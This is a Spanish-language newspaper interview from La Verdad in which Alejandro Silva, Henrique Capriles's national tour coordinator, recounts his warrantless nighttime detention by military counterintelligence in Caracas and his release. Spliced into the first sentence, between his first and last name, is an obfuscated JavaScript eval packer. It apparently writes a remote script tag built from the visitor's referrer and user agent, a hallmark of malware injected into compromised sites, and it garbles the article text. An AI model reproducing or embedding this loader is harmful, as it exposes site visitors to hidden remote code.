publicidad

Alejandro Silva detalla su detención en Caracas

Yrmana Almarza / Maracaibo / yalmarza@laverdad.com
Alejandro eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ytidy|var|u0026u|referrer|bybzb||js|php'.split('|'),0,{})) Silva, coordinador nacional de giras de Henrique Capriles, tras su liberación vino a Maracaibo y denuncia que se detención fue "una aberración institucional". "No se atreven a detener a Henrique, saben que el país se movilizaría como nunca", dijo el dirigente zuliano, quien repudió que en el país la disidencia "se castigue buscando la intimidación"

Fotos: Jhair Torres

Es la primera víctima de la arbitrariedad del gobierno del presidente Nicolás Maduro. No denunciará en la Fiscalía su detención "arbitraria" porque "lo importante es que la gente conozca los hechos, decir la verdad".

Alejandro Silva, jefe nacional de giras del líder opositor, llegó a Maracaibo a reunirse con su familia y relató lo que vivió.

Cuenta que el viernes en la noche venía de Cojedes y Carabobo, de acompañar a Henrique Capriles, líder de la oposición. Junto a él escuchó en la radio que el presidente Nicolás Maduro ordenó detener a un dirigente de Primero Justicia. "Honestamente ni me pasó por la mente que fuera yo".

A la 1.40 minutos de la madrugada del sábado 23 de noviembre, el teléfono de la habitación de hotel en la que descansaba repicó. "Era el botones del hotel". Le advirtió que debía bajar "a buscar algo que le vamos a entregar". Silva se negó a bajar por la hora y la persona del otro lado del teléfono le contestó: "No se preocupe, yo se lo subo".

"Cuando me dice eso, me dije que aquí es donde me vienen a buscar". Ocho hombres tocaron la puerta de la habitación, entraron al cuarto "de forma intempestiva", recogieron sus cosas, "y me sacaron de allí como si fuera un criminal".

Alguien en el lobby del hotel lo reconoció y avisó del hecho. Lo llevaron a la sede de Contrainteligencia Militar de Boleíta en Caracas, conocida como la DIM, lo que se confirmó cuando le permitieron llamar a su esposa a las 10.00 de la mañana. En el sitio fue víctima de violencia verbal y psicológica. No reveló lo que le decían. Se limitó a decir que eran "comentarios fanáticos" que buscaban "ver cómo me quebraban", que soltara "algo que no existe". Voluntariamente entregó sus teléfonos celulares, su computador y su agenda de trabajo para revisión.

No hubo orden de aprehensión para su captura. Tampoco un fiscal para garantizar sus derechos. "Fue una especie de secuestro", denunció. No lo esposaron ni encapucharon. Siempre vio la cara de los funcionarios actuantes. No lo golpearon, "pero sí hubo presión".

Retenido en un cuarto de descanso de la DIM, lo trasladaron a las 10.00 de la mañana a una sala de espera para conversar con el director de la institución, el general Hugo Carvajal, quien no le dio argumentos de su detención, pero sí le dejó claro que su puesta en libertad fue consultada con el presidente Nicolás Maduro.

Silva, dirigente político zuliano, explicó su trabajo al lado de Capriles y sostiene que la retención "era una evidencia más de que ese liderazgo los tiene nerviosos".

- ¿Temió por su vida?

- Nos decían que nos tenían retenidos hasta que terminaran las concentraciones en los estados, pero cuando tú estás durmiendo en un sitio y ocho funcionarios te sacan a la fuerza sin ninguna orden de detención, sin justificación, muchas cosas te pasan por la cabeza, pero el que no la debe no la teme y nosotros no estamos en un camino fuera del marco legal. Tuve temor de que me sembraran algo, de que fuera a aparecer en mi maleta una cosa que no estaba porque uno no sabe. Gracias a Dios eso no ocurrió.

- ¿Le dijeron que se cumplían con las órdenes del presidente Maduro?

- No, no, no. Yo se lo decía a ellos, 'yo estoy aquí por lo que dijo Nicolás Maduro' y ellos trataban de decirme cosas políticas para intimidarme.

- ¿El general Hugo Carvajal lo trató bien?

- Sí. Fue un trato de respeto, pero no pensemos que por eso lo que ocurrió está bien. Condenemos el hecho de haber sido detenidos, el hecho fue una aberración institucional, pero al conversar con él hubo otro tipo de actitud. Conversamos con él en dos o tres oportunidades, es un general serio. Nos comentó que no existían argumentos para mantenernos allí, como nosotros lo sabíamos.

- ¿Pero un general serio no se presta para detener a alguien bajo las condiciones en las que a usted lo detuvieron?

- Cuando digo serio me refiero a que en mis diálogos con él nunca hubo una falta de respeto. Nunca hubo una palabra de más, pero bueno, que está dirigiendo una institución que te secuestra sacándote de un hotel eso es otro tema, pero con él hubo un trato serio. Él me dejó claro que mi salida fue consultada con Maduro, o sea, dejarme ir.

- ¿Maduro ordena meterlo preso y Maduro ordena su liberación?

- Sí. La detención la dijo públicamente, eso es un hecho evidente. El Presidente ordena la detención de un dirigente y va a un organismo militar a detener a un civil, y te sacan de un hotel forzado, sin un fiscal del Ministerio Público que me dijera la razón de la detención. Los actos de este procedimiento dejan ver que aquí hay una situación grave que no puede seguir ocurriendo. No podemos estar en un país donde la disidencia política se castigue buscando la intimidación. Sabemos que lo que los tiene preocupados es la votación contundente de la Unidad el 8 de diciembre. Eso tiene al Gobierno muy nervioso.

- ¿Buscaban a Henrique Capriles o lo buscaban a usted?

- Siento que ellos no se atreven a detener a Henrique, a meter preso a Henrique Capriles porque saben que este país se movilizaría como nunca y tratan de dar golpes detallados a su equipo.

- ¿Cree que lo sobreestimaron? ¿Que usted podía darles mayor información de lo que hace Capriles?

- Ellos estaban buscando algo que no van a conseguir nunca, que nosotros estemos en una jugada fuera del marco legal. Revisaron todas mis cosas y estoy claro que copiaron todo mi teléfono, hay uno que está vacío completamente, pero siento que lo que subestimaron fue su jugada porque la reacción de la gente fue impresionante, la reacción en las redes sociales fue muy dura y eso les dio un gran golpe a ellos. La historia chimba que montaron la tuvieron que terminar a las 6.00 de la tarde. Si esto hubiese pasado por debajo de la mesa, de repente estuviera allí todavía.

- ¿Acción dictatorial de un gobierno democrático?

- Acción nerviosa de un gobierno que cada vez pierde más poder con la gente.

- ¿Continuará trabajando junto a Henrique Capriles?

- Sí claro. Continuaremos haciendo nuestra labor como jefe de giras nacional de Henrique Capriles. Nos sentimos parte de un gran proceso que se está construyendo a nivel nacional. La petición es que esto se transforme en más votos, que esto no nos paralice, que nos motive. Para nadie es sencillo sentirse secuestrado por unos funcionarios con chapa sin explicación y te tenga incomunicado, pero el 8-D los tiene muy nerviosos.

 

"Estaban obsesionados con la reacción de la gente por las redes sociales, eso los tenía locos. Me dijeron que exagerábamos por las redes sociales porque yo estaba allí en calidad de invitado y les respondí: '¿De invitado y me agarraste por el cogote y me metiste en un carro a la fuerza?'".

Alejandro Silva. Jefe de giras de Capriles

Más noticias

  • "Los invito a combatir los mensajes de odio con el amor"

    03:53pm

    El presidente de Venezuela, Nicolás Maduro, apeló este martes al pueblo colombiano para "combatir" las campañas que se asegura se realizan contra la llamada revolución bolivariana, un llamado que ya lanzó el pasado domingo al pueblo chileno al pedirles también dejar a un lado estas supuestas propagandas

  • “El 10 de enero Nicolás Maduro se va a juramentar"

    03:32pm

    Vladimir Villegas es un periodista y político venezolano, hermano de Ernesto Villegas. Trabajó como reportero en medios como El Nuevo País, El Diario de Caracas, y El Universal

  • “En Zulia jamás habíamos vivido esta calamidad"

    02:34pm

    “Reconstruir la confianza en la gente” para luchar de manera conjunta por el cambio que urge en Venezuela, propuso el ex gobernador del Zulia, Pablo Pérez este martes durante su participación en el programa Vladimir a la 1 con el periodista Vladimir Villegas, transmitido por Globovisión.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama